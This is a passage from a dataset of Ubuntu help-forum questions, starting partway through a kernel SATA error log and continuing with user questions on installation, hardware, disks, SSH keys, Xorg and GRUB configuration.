537.585992 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5900000 action 0xe frozen t4 02:46:03 [ 537.585996 ] ata1 : irq_stat 0x00000040 , connection status changed 02:46:03 [ 537.585999 ] ata1 : serror : { dispar linkseq trstatrns devexch } 02:46:03 [ 537.586002 ] ata1 : hard resetting link 02:46:03 [ 537.586028 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen t4 02:46:03 [ 537.586030 ] ata2 : irq_stat 0x00000040 , connection status changed 02:46:03 [ 537.586033 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:46:03 [ 537.586036 ] ata2 : hard resetting link 02:46:04 [ 538.330147 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:04 [ 538.330168 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:04 [ 538.334389 ] ata2.00 : configured for udma/133 02:46:04 [ 538.334398 ] ata2 : eh complete 02:46:04 [ 538.343511 ] ata1.00 : configured for udma/133 02:46:04 [ 538.343519 ] ata1 : eh complete 02:46:04 [ 538.456413 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=0 02:46:04 [ 538.459404 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=0 02:46:04 [ 538.540138 ] ata1.00 : limiting speed to udma/100 : pio4 02:46:04 [ 538.540144 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5850000 action 0xe frozen 02:46:04 [ 538.540148 ] ata1 : irq_stat 0x00000040 , connection status changed 02:46:04 [ 538.540153 ] ata1 : serror : { phyrdychg commwake linkseq trstatrns devexch } 02:46:04 [ 538.540159 ] ata1 : hard resetting link 02:46:04 [ 538.540202 ] ata2.00 : limiting speed to udma/100 : pio4 02:46:04 [ 538.540207 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5950000 action 0xe frozen 02:46:04 [ 538.540211 ] ata2 : irq_stat 0x00000040 , connection status changed 02:46:04 [ 538.540215 ] ata2 : serror : { phyrdychg commwake dispar linkseq trstatrns devexch } 02:46:04 [ 538.540220 ] ata2 : hard resetting link 02:46:05 [ 539.290054 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:05 [ 539.290041 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:05 [ 539.294100 ] ata2.00 : configured for udma/100 02:46:05 [ 539.294106 ] ata2 : eh complete 02:46:05 [ 539.314125 ] ata1.00 : configured for udma/100 02:46:05 [ 539.314132 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- 02:46:05 [ 539.314140 ] warning : at /build/buildd/linux-2.6.35/drivers/ata/libata-eh.c:3638 ata_eh_finish+0xdf/0xf0 ( ) 02:46:05 [ 539.314144 ] hardware name : macbookpro5,3 02:46:05 [ 539.314146 ] modules linked in : michael_mic arc4 xt_multiport binfmt_misc rfcomm sco bnep l2cap parport_pc ppdev nvidia ( p ) ipt_reject xt_recent snd_hda_codec_cirrus xt_limit xt_tcpudp ipt_addrtype xt_state snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi applesmc led_class ip6table_filter lib80211_crypt_tkip snd_rawmidi snd_seq_midi_event ip6_tables input_polldev hid_apple snd_seq wl ( p ) snd_timer snd_seq_device snd joydev bcm5974 usbhid mbp_nvidia_bl uvcvideo btusb videodev v4l1_compat v4l2_compat_ioctl32 nf_nat_irc hid nf_conntrack_irc soundcore snd_page_alloc i2c_nforce2 coretemp lib80211 bluetooth nf_nat_ftp nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack_ftp nf_conntrack lp parport iptable_filter ip_tables x_tables usb_storage firewire_ohci firewire_core forcedeth crc_itu_t ahci libahci 02:46:05 [ 539.314221 ] pid : 202 , comm : scsi_eh_0 tainted : p 2.6.35-25-generic # 44-ubuntu 02:46:05 [ 539.314224 ] call trace : 02:46:05 [ 539.314233 ] [ < ffffffff8106091f > ] warn_slowpath_common+0x7f/0xc0 02:46:05 [ 539.314237 ] [ < ffffffff8106097a > ] warn_slowpath_null+0x1a/0x20 02:46:05 [ 539.314242 ] [ < ffffffff813dc77f > ] ata_eh_finish+0xdf/0xf0 02:46:05 [ 539.314246 ] [ < ffffffff813e441e > ] sata_pmp_error_handler+0x2e/0x40 02:46:05 [ 539.314256 ] [ < ffffffffa00021bf > ] ahci_error_handler+0x1f/0x90 [ libahci ] 02:46:05 [ 539.314261 ] [ < ffffffff813dd6d2 > ] ata_scsi_error+0x492/0x5e0 02:46:05 [ 539.314266 ] [ < ffffffff813b24cd > ] scsi_error_handler+0x10d/0x190 02:46:05 [ 539.314270 ] [ < ffffffff813b23c0 > ] ? scsi_error_handler+0x0/0x190 02:46:05 [ 539.314275 ] [ < ffffffff8107f266 > ] kthread+0x96/0xa0 02:46:05 [ 539.314280 ] [ < ffffffff8100aee4 > ] kernel_thread_helper+0x4/0x10 02:46:05 [ 539.314284 ] [ < ffffffff8107f1d0 > ] ? kthread+0x0/0xa0 02:46:05 [ 539.314288 ] [ < ffffffff8100aee0 > ] ? kernel_thread_helper+0x0/0x10 02:46:05 [ 539.314291 ] -- - [ end trace 76dbffc2d5d49d9b ] -- - 02:46:05 [ 539.314296 ] ata1 : eh complete 02:46:12 [ 547.040091 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen 02:46:12 [ 547.040098 ] ata1.00 : failed command : identify device 02:46:12 [ 547.040106 ] ata1.00 : cmd ec/00:00:00:00:00/00:00:00:00:00/40 tag 0 pio 512 in 02:46:12 [ 547.040108 ] res 40/00:01:00:00:00/00:00:00:00:00/e0 emask 0x4 ( timeout ) 02:46:12 [ 547.040111 ] ata1.00 : status : { drdy } 02:46:12 [ 547.040117 ] ata1 : hard resetting link 02:46:13 [ 547.390144 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:13 [ 547.408430 ] ata1.00 : configured for udma/100 02:46:13 [ 547.408438 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- 02:46:13 [ 547.408447 ] warning : at /build/buildd/linux-2.6.35/drivers/ata/libata-eh.c:3638 ata_eh_finish+0xdf/0xf0 ( ) 02:46:13 [ 547.408451 ] hardware name : macbookpro5,3 02:46:13 [ 547.408453 ] modules linked in : michael_mic arc4 xt_multiport binfmt_misc rfcomm sco bnep l2cap parport_pc ppdev nvidia ( p ) ipt_reject xt_recent snd_hda_codec_cirrus xt_limit xt_tcpudp ipt_addrtype xt_state snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi applesmc led_class ip6table_filter lib80211_crypt_tkip snd_rawmidi snd_seq_midi_event ip6_tables input_polldev hid_apple snd_seq wl ( p ) snd_timer snd_seq_device snd joydev bcm5974 usbhid mbp_nvidia_bl uvcvideo btusb videodev v4l1_compat v4l2_compat_ioctl32 nf_nat_irc hid nf_conntrack_irc soundcore snd_page_alloc i2c_nforce2 coretemp lib80211 bluetooth nf_nat_ftp nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_conntrack_ftp nf_conntrack lp parport iptable_filter ip_tables x_tables usb_storage firewire_ohci firewire_core forcedeth crc_itu_t ahci libahci 02:46:13 [ 547.408528 ] pid : 202 , comm : scsi_eh_0 tainted : p w 2.6.35-25-generic # 44-ubuntu 02:46:13 [ 547.408531 ] call trace : 02:46:13 [ 547.408540 ] [ < ffffffff8106091f > ] warn_slowpath_common+0x7f/0xc0 02:46:13 [ 547.408544 ] [ < ffffffff8106097a > ] warn_slowpath_null+0x1a/0x20 02:46:13 [ 547.408549 ] [ < ffffffff813dc77f > ] ata_eh_finish+0xdf/0xf0 02:46:13 [ 547.408553 ] [ < ffffffff813e441e > ] sata_pmp_error_handler+0x2e/0x40 02:46:13 [ 547.408563 ] [ < ffffffffa00021bf > ] ahci_error_handler+0x1f/0x90 [ libahci ] 02:46:13 [ 547.408567 ] [ < ffffffff813dd6d2 > ] ata_scsi_error+0x492/0x5e0 02:46:13 [ 547.408572 ] [ < ffffffff813b24cd > ] scsi_error_handler+0x10d/0x190 02:46:13 [ 547.408577 ] [ < ffffffff813b23c0 > ] ? scsi_error_handler+0x0/0x190 02:46:13 [ 547.408582 ] [ < ffffffff8107f266 > ] kthread+0x96/0xa0 02:46:13 [ 547.408587 ] [ < ffffffff8100aee4 > ] kernel_thread_helper+0x4/0x10 02:46:13 [ 547.408591 ] [ < ffffffff8107f1d0 > ] ? kthread+0x0/0xa0 02:46:13 [ 547.408595 ] [ < ffffffff8100aee0 > ] ? kernel_thread_helper+0x0/0x10 02:46:13 [ 547.408598 ] -- - [ end trace 76dbffc2d5d49d9c ] -- - 02:46:13 [ 547.408620 ] ata1 : eh complete 02:46:13 [ 547.562470 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:46:13 [ 547.671380 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:46:13 [ 547.738198 ] ata1.00 : limiting speed to udma/33 : pio4 02:46:13 [ 547.738204 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5800000 action 0xe frozen t4 02:46:13 [ 547.738208 ] ata1 : irq_stat 0x00000040 , connection status changed 02:46:13 [ 547.738212 ] ata1 : serror : { linkseq trstatrns devexch } 02:46:13 [ 547.738218 ] ata1 : hard resetting link 02:46:13 [ 547.738262 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5900000 action 0xe frozen t4 02:46:13 [ 547.738265 ] ata2 : irq_stat 0x00000040 , connection status changed 02:46:13 [ 547.738269 ] ata2 : serror : { dispar linkseq trstatrns devexch } 02:46:13 [ 547.738274 ] ata2 : hard resetting link 02:46:14 [ 548.482561 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:14 [ 548.484083 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:14 [ 548.486809 ] ata2.00 : configured for udma/100 02:46:14 [ 548.486818 ] ata2 : eh complete 02:46:14 [ 548.498998 ] ata1.00 : configured for udma/33 02:46:14 [ 548.499004 ] ata1 : eh complete 02:46:18 [ 552.410499 ] ext4-fs ( dm-0 ) : re-mounted . opts : errors=remount-ro , commit=600 02:46:18 [ 552.522521 ] ext4-fs ( dm-2 ) : re-mounted . opts : commit=600 02:46:18 [ 552.529674 ] ata1 : exception emask 0x10 sact 0x0 serr 0x5800000 action 0xe frozen t4 02:46:18 [ 552.529678 ] ata1 : irq_stat 0x00000040 , connection status changed 02:46:18 [ 552.529680 ] ata1 : serror : { linkseq trstatrns devexch } 02:46:18 [ 552.529684 ] ata1 : hard resetting link 02:46:18 [ 552.529716 ] ata2 : exception emask 0x10 sact 0x0 serr 0x5800000 action 0xe frozen t4 02:46:18 [ 552.529718 ] ata2 : irq_stat 0x00000040 , connection status changed 02:46:18 [ 552.529720 ] ata2 : serror : { linkseq trstatrns devexch } 02:46:18 [ 552.529723 ] ata2 : hard resetting link 02:46:19 [ 553.280059 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:19 [ 553.280068 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) 02:46:19 [ 553.284141 ] ata2.00 : configured for udma/100 02:46:19 [ 553.284150 ] ata2 : eh complete 02:46:19 [ 553.301629 ] ata1.00 : configured for udma/33 02:46:19 [ 553.301637 ] ata1 : eh complete
26219	problems building clamcour	when i try to install clamcour from terminal , it gives me this error , somebody can help me ? calmcourdir # ./configure checking for libraries containing socket functions ... -lc checking for socket ... yes checking for bind ... yes checking for listen ... yes checking for accept ... yes checking for shutdown ... yes checking for socklen_t ... yes checking for struct sockaddr_un.sun_len ... no system log functions checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking for openlog ... yes checking for syslog ... yes checking for closelog ... yes time functions checking whether time.h and sys/time.h may both be included ... yes checking whether struct tm is in sys/time.h or time.h ... time.h checking for localtime_r ... yes checking for strftime ... yes checking for unistd.h ... ( cached ) yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking for sysconf ... yes bzip2 support checking bzlib.h usability ... no checking bzlib.h presence ... no checking for bzlib.h ... no checking for bz2_bzwriteopen in -lbz2 ... no gzip support checking zlib.h usability ... no checking zlib.h presence ... no checking for zlib.h ... no checking for gzopen in -lz ... no libclamav support checking for /usr/bin/clamav-config ... no checking for /usr/local/bin/courier-config ... no checking for /usr/clamav/bin/clamav-config ... no checking for /usr/local/clamav/bin/clamav-config ... no ./configure : line 25234 : : command not found configure : error : can not find clamav-config
26227	ca n't find sendmail courier binary when configuring clamcour 2.0	when i install clamcoure and run this command clamcourdir # sudo ./configure it gives me this error : configure : error : can not find sendmail courier binary
26228	how can i reinstall apache httpd after deleting some of the configuration files ?	i recently was messing around with my apache config and wanted to reinstall so i could start from fresh . i followed some forum posts about reinstalling the apache2 package and this ended up deleting my /etc/apache2 folder . now matter how many things i try i ca n't seem to do a full wipe of the apache install and then reinstall . sudo apt-get install apache2 or reinstall does n't do anything . i ca n't seem to remove it using synaptic either . is there anything i can do to have a fresh apache install on my computer again ?
26235	temporarily prevent hibernation	how can i temporarily prevent ubuntu from hibernating ? is there a binary available that makes use of an api similar to the one preventing screen savers from activating for hibernation ? i 'm utilizing a network service provided by my netbook without physically making use of the netbook , so it hibernates after the time specified in the power management preferences .
26237	difference between /var/log/messages , /var/log/syslog , and /var/log/kern.log ?	for the purposes of kernel logging , why do i have three different , non-inclusive levels of logging amongst /var/log/messages , /var/log/syslog , and /var/log/kern.log ?
26239	what is a good card creating application ?	is there a good card creating application ? have n't had one in over ten years but used to have one that had all types of easy to use templates designs etc for ton of occasions . looking for something that can fill this void and do everything from christmas cards to greeting cards and get well cards . i know this is possible in gimp/scribus but i 'm looking for something less involved
26242	how do i get the right alt key to have the same function as the left alt key when using a macbook pro 5,3 ?	my right alt key does n't do a thing . it 's not acting like a metakey at all . i can hold it down and type normally . i expect the right alt key to do what the left one does . how can i fix this ? i have a macbook pro 5,3 .
26248	how to get keyboard light keys working on macbook ?	i 've got a macbook pro with keyboard light brightness keys . how to i make them work ?
26251	dropbox often stalls `` saving 1 file '' , have to restart it	dropbox works well , but often the tray icon starts spinning forever with the tooltip message `` saving 1 file ... '' i usually do n't worry about it , and i never had any loss , despite switching computers often . an easy solution is to restart dropbox , it spins for a second before the tooltip says `` all files up to date '' . but how to permanently prevent this problem ? ubuntu 2010.10 dropbox 0.7.110 dropbox stores about 50 text files , 1 mb in total .
26258	where are the launcher shortcuts stored in ubuntu netbook ?	the thing on the left is called a launcher right ? anyway , i want to apply a few applications with custom arguments , namely google-chrome -- user-agent `` that of ipad 's '' possible ? oh , and how would i utilise all that free desktop space that unr does n't want me to use ? way to much space there - why ca n't i put desktop icons there ?
26259	usb recognized but not available ?	i installed ubuntu and i 'm teaching my mother to use it . everything is going fine except that her new usb pen drive ( 8gb - fat32 ) is not working in linux ( but it works in windows and mac ) . os : kubuntu lucid kernel : 2.6.32-28-generic before and after `` lsusb '' : root @ desktop : /etc # lsusb bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub root @ desktop : /etc # lsusb bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 005 : id 3538:0901 power quotient international co. , ltd bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub dmesg : [ 1061.544029 ] usb 3-1 : new full speed usb device using uhci_hcd and address 2 [ 1061.709572 ] usb 3-1 : configuration # 1 chosen from 1 choice [ 1061.744920 ] scsi5 : scsi emulation for usb mass storage devices [ 1061.752290 ] usb-storage : device found at 2 [ 1061.752297 ] usb-storage : waiting for device to settle before scanning [ 1066.753954 ] usb-storage : device scan complete [ 1066.756871 ] scsi 5:0:0:0 : direct-access-rbc pq : 2 ansi : 4 [ 1066.763379 ] scsi 5:0:0:0 : attached scsi generic sg3 type 14 but in `` fdisk -l '' it is not shown , and not found under /media/ : root @ desktop : /etc # fdisk -l disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x90789078 device boot start end blocks id system /dev/sda1 * 1 7296 58605088+ 7 linux what else can be done ? any help is appreciated .
26263	should i disable write cache in an mdadm array ?	my gut says disabling write cache on soft raid5 is the smart move , but i 'm not certain . possible considerations : the drives a wd20ears with 64mb cache . the server has n't gone down due to a power outage in the last 4-5 years . ( even without a ups ) most of the data is media that can be ripped again from cd/dvd or downloaded from the relevant service , but some of it is pretty critical ( family photo 's , personal docs etc , but there is a working backup that 's tested for recovery twice a year ) . what are the pro 's and con 's of each decision ?
26264	install ubuntu & win7 side by side	currently i do have win-xp ( c : partition ) which is the system & primary partition . win7 is the boot partition and the logical drive . i want to replace win-xp with ubuntu 10.04 desktop . after i restarted with the ubuntu cd all went well until the partitioning . the installer screen displayed that win7 was in dev/sda1 and the rest dev/sda2 it suggested to install ubuntu . when i checked the disk size it points dev/sda1 to c : partition which is where win-xp is installed . while the other partition e : is where my win7 is . this could be due to the boot loader residing in the c : partition or c being the system partition . when i try to manually changes i selected dev/sda1 where the ubuntu should be installed & tried to resize the partition but it freezes . what am i not doing correctly ? thanks
26269	how do i install ubuntu from an usb drive / create a live usb-stick in windows ?	i tried to use the usb-creator.exe from ubuntu 10.10 desktop i386 iso image and it does create an usb stick that does n't boot . when i try to boot from it i get : operating system not found . i try to do this from windows 7 x64 . i 'm not looking to create a live ubuntu media , only an installation usb disk . i repeated the process several times and i even tried to reformat the usb drive ( fat32 ) , no success yet . the usb stick is a 8gb one .
26271	how to disable samba shared folder password prompt	i have shared a samba folder on ubuntu desktop . is there a way to disable ubuntu shared folder password prompt when accessed from windows ? .
26273	make a photo cd	i have some photos taken with a digital camera . which software under ubuntu can i use to make a photo cd out of it , which can be read on standard cd/dvd players for tv sets ?
26285	how do i play hd video without it stuttering ?	i want play a blu ray video from my hard drive with boxee , but it chokes all the time . i 've tried to play it with others video players but it is the same . i think that is a 10gb .mkv file with 10gb . stuttering video with vlc , mplayer , and the default video player on ubuntu . i read in many forums just canâ´t put this to work . any idea ? thanks . ubuntu 10.10 , my pc specs : single core 2ghz ati hd 4350 ( i have installed the drivers from `` hardware drivers '' ) , 2g memory *edit : problem solved , this weekend had buy a motherboard and a processor dualcore 2.5ghz , no more stuttering . thanks alot for your help .
26286	how to generate a private-public key using ssh-keygen and make it authorized ?	i want to generate a public-private key on sever 1 and store it in a location which is not the default location . thereafter , save the public key on server 2 ; once again not at the default location . then make this key an authorized key . however , i can not find authorized_keys file in ~/.ssh folder . how do i make it authorized ?
26290	50-synaptics.conf options not working	how does ubuntu come up with the default synaptics settings ? i 've got ubuntu netbook 10.10 installed on an eeepc 900 . out of the box tapbutton2 was set to 3 , and tapbutton3 was set to 2 . i have several custom synaptics settings i want as system wide defaults . right now i use a script with synclient commands i have to run every boot or wake . pita . it used to be everything went in xorg.conf..which no longer exists . i 'm trying to learn the new way , which is apparently conf files at /usr/share/x11/xorg.conf.d . i edited /usr/share/x11/xorg.conf.d/50-synaptics.conf to look like : section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' matchdevicepath `` /dev/input/event* '' option `` lockeddrags '' `` 1 '' option `` tapbutton2 '' `` 2 '' option `` tapbutton3 '' `` 3 '' endsection i tried modifying the touchpad section of /usr/share/x11/xorg.conf.d/10-evdev.conf , no cigar . tried the same 50-synaptics.conf and 10-evdev.conf files in a /etc/x11/xorg.conf.d section . tried making a /etc/x11/xorg.conf with the inputclass section above . no cigar . i always revert the old change first , make the new one , and start a new x session to test ( startx -- :2 ) . something i find interesting is that after any switch to the virtual terminal ( ctrl+alt+f1 ) my synaptics settings are lost . significant ? i do n't know . these are the synclient commands i run : jake @ clyde : ~ $ cat bin/synset.sh # ! /bin/bash synclient tapbutton2=2 synclient tapbutton3=3 synclient lockeddrags=1 here is what 's in /dev/input : jake @ clyde : /dev/input $ ls by-path/ event0 event1 event2 event3 event4 event5 event6 event7 mice mouse0 jake @ clyde : /dev/input $ ls -l by-path/ total 0 lrwxrwxrwx 1 root root 9 2011-02-18 15:43 platform-eeepc-event - > ../event6 lrwxrwxrwx 1 root root 9 2011-02-18 15:43 platform-i8042-serio-0-event-kbd - > ../event4 lrwxrwxrwx 1 root root 9 2011-02-18 15:43 platform-i8042-serio-1-event-mouse - > ../event7 lrwxrwxrwx 1 root root 9 2011-02-18 15:43 platform-i8042-serio-1-mouse - > ../mouse0 the x log is rather long , but here 's some output . if the whole thing would be useful , where is a good place to upload it ? jake @ clyde : /var/log $ egrep `` synaptics|touchpad '' xorg.0.log [ 16.707 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/event7 ) [ 16.707 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` evdev touchpad catchall '' [ 16.707 ] ( ** ) etps/2 elantech touchpad : applying inputclass `` touchpad catchall '' [ 16.707 ] ( ii ) loadmodule : `` synaptics '' [ 16.707 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 16.707 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 16.708 ] ( ii ) synaptics touchpad driver version 1.2.2 [ 16.708 ] ( ii ) etps/2 elantech touchpad : x-axis range 8 - 1144 [ 16.708 ] ( ii ) etps/2 elantech touchpad : y-axis range 8 - 760 [ 16.708 ] ( ii ) etps/2 elantech touchpad : device does not report pressure , will use touch data . [ 16.708 ] ( ii ) etps/2 elantech touchpad : finger width range 0 - 0 [ 16.708 ] ( ii ) etps/2 elantech touchpad : buttons : left right double triple [ 16.708 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 16.708 ] ( ** ) etps/2 elantech touchpad : always reports core events [ 16.708 ] ( ii ) xinput : adding extended input device `` etps/2 elantech touchpad '' ( type : touchpad ) [ 16.708 ] ( ** ) etps/2 elantech touchpad : ( accel ) keeping acceleration scheme 1 [ 16.709 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration profile 0 [ 16.709 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration factor : 2.000 [ 16.709 ] ( ** ) etps/2 elantech touchpad : ( accel ) acceleration threshold : 4 [ 16.709 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 16.710 ] ( ii ) config/udev : adding input device etps/2 elantech touchpad ( /dev/input/mouse0 ) [ 15516.377 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 44215.009 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 44358.733 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 44414.761 ] ( -- ) etps/2 elantech touchpad : touchpad found [ 44515.817 ] ( -- ) etps/2 elantech touchpad : touchpad found it looks like this remains unresolved in current ubuntus ( 12.04 , 12.10 ) . ubuntu is n't loading xorg.conf ubuntu completly ignores my xorg.d settings x11 ignoring options in configuration for input device
26297	wubi error about `` invalid tag data ''	i tried to install ubuntu 10.10 and 10.04 through wubi in windows 7 . even after i disable the firewall and antivirus i get this error again and again . invalid tag data . check len ( d=1 , ( ord ( d ) & 128 ) ==128 . recvd - > ( < > it becomes unable to install . i tried to install to c drive and e drive also .
26298	restrictions on a user account	is there a way i can restrict the internet connection and application use of another user account ? what i 'd like to do is let that account connect for the use of dropbox , but otherwise have no internet access . also , have a list of applications that the user can use , or better , a list that they can not .
26299	why is my root filesystem always scanned at boot ?	i always have a pause at boot saying my filesystems are being checked ( with a `` press c to cancel '' note , too ) . actually ( seeing boot.log ) i think it 's the / fs , which is located at /dev/sdb5 several questions altoghether , here ( hope this does not break any rule ) : is this normal ? can i ( or even should i ) prevent this anyhow ? according to boot.log ( below ) the fs does not seem to be 'clean ' , or , at least , it 's in an state or condition that makes fsck always can it for errors for a while ( just a few seconds ) . how can i fix it ? edit : this is my boot.log : fsck desde util-linux-ng 2.17.2 udevd [ 515 ] : can not read '/etc/udev/rules.d/z80_user.rules' /dev/sdb5 : 249045/32841728 ficheros ( 0.3 % no contiguos ) , 20488485/131338752 bloques init : ureadahead-other main process ( 1111 ) terminated with status 4 init : ureadahead-other main process ( 1116 ) terminated with status 4 password : * starting apparmor profiles [ 160g skipping profile in /etc/apparmor.d/disable : usr.bin.firefox [ 154g [ ok ] * setting sensors limits [ 160g [ 154g [ ok ] and this is dumpe2fs results for the filesystem being checked ( well , the relevant part of the log ) : filesystem volume name : < none > last mounted on : / filesystem uuid : 42509bf9-f3e6-460a-8947-ec0f5c1fbcc8 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 32841728 block count : 131338752 reserved block count : 6566937 free blocks : 110850356 free inodes : 32592701 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 992 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : fri dec 10 19:44:15 2010 last mount time : mon feb 14 17:00:02 2011 last write time : mon feb 14 16:59:45 2011 mount count : 1 maximum mount count : 33 last checked : mon feb 14 16:59:45 2011 check interval : 15552000 ( 6 months ) next check after : sat aug 13 17:59:45 2011 lifetime writes : 331 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 first orphan inode : 28049496 default directory hash : half_md4 directory hash seed : d3d24459-514b-4413-b840-e970b766095b journal backup : inode blocks journal features : journal_incompat_revoke tama単o de fichero de transacciones : 128m journal length : 32768 journal sequence : 0x0005e0c4 journal start : 1 this is my /etc/fstab file : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sdb5 : uuid=42509bf9-f3e6-460a-8947-ec0f5c1fbcc8 / ext4 errors=remount-ro 0 1 # entry for /dev/sdb1 : uuid=685ec6355ec5fc36 /media/datos ntfs defaults , user 0 0 # entry for /dev/sda2 : uuid=6a366b05366ad21d /media/w7 ntfs defaults , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 0 0 # entry for /dev/sdb6 : uuid=66aa7f93-4c89-4118-af47-fdaa78db8f22 none swap sw 0 0 # lector de tarjetas impresora //192.168.85.77/memory_card /media/hp smbfs defaults 0 0
26300	settings xorg.conf to be used with vesa driver ?	i have an brand new installation of ubuntu 9.10 ( karmic version ) where everything is fine except the video resolution . in ubuntu 9.10 , the file xorg.conf is empty by default . i 'm using an onboard video card , and ubuntu can not find the right resolution for me . it always uses 800x600 , but i need at least 1024x768 . also , my monitor is listed as unknown type . ubuntu did find the right resolution when i changed the monitor to a samsung monitor . by the way what are the generic settings to put inside xorg.conf ? what is the settings for refresh rate , for example , i got a resolution of 1280x800 , but the refresh rate generally between 60 ~ 80 htz is zero on my resolution.. in 1024 resolution my refresh rate is 75 htz.. what is going on with my resolution and how to modify the refresh rate ? ? many thanks !
26301	why does n't my grub background show ?	i 've tried to change resolution , colors and background image for my grub menu , but i get no background ( well , just a black one , no image ) ... . what am i doing wrong ? this is my grub.cfg ( omitting the os 's part ) : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' $ { saved_entry } '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set 42509bf9-f3e6-460a-8947-ec0f5c1fbcc8 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=1280x1024x24 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set 42509bf9-f3e6-460a-8947-ec0f5c1fbcc8 set locale_dir= ( $ root ) /boot/grub/locale set lang=es insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set 42509bf9-f3e6-460a-8947-ec0f5c1fbcc8 insmod jpeg if background_image /boot/grub/serenity_enchanted_by_sirpecangum.jpg ; then set color_normal=black/white set color_highlight=brown/light-gray else set menu_color_normal=white/black set menu_color_highlight=black/light-gray fi # # # end /etc/grub.d/05_debian_theme # # # the selected image has been copied to /boot/grub/serenity_enchanted_by_sirpecangum.jpg with no luck . i 'm for sure missing something ( probably something obvious ) but i do n't really get it ...
26302	running local script on a remote machine	i want to run a sript that is present in local machine , but it should perform operations on remote machine . i have already generated public-private keys , so no password authentiaction is required
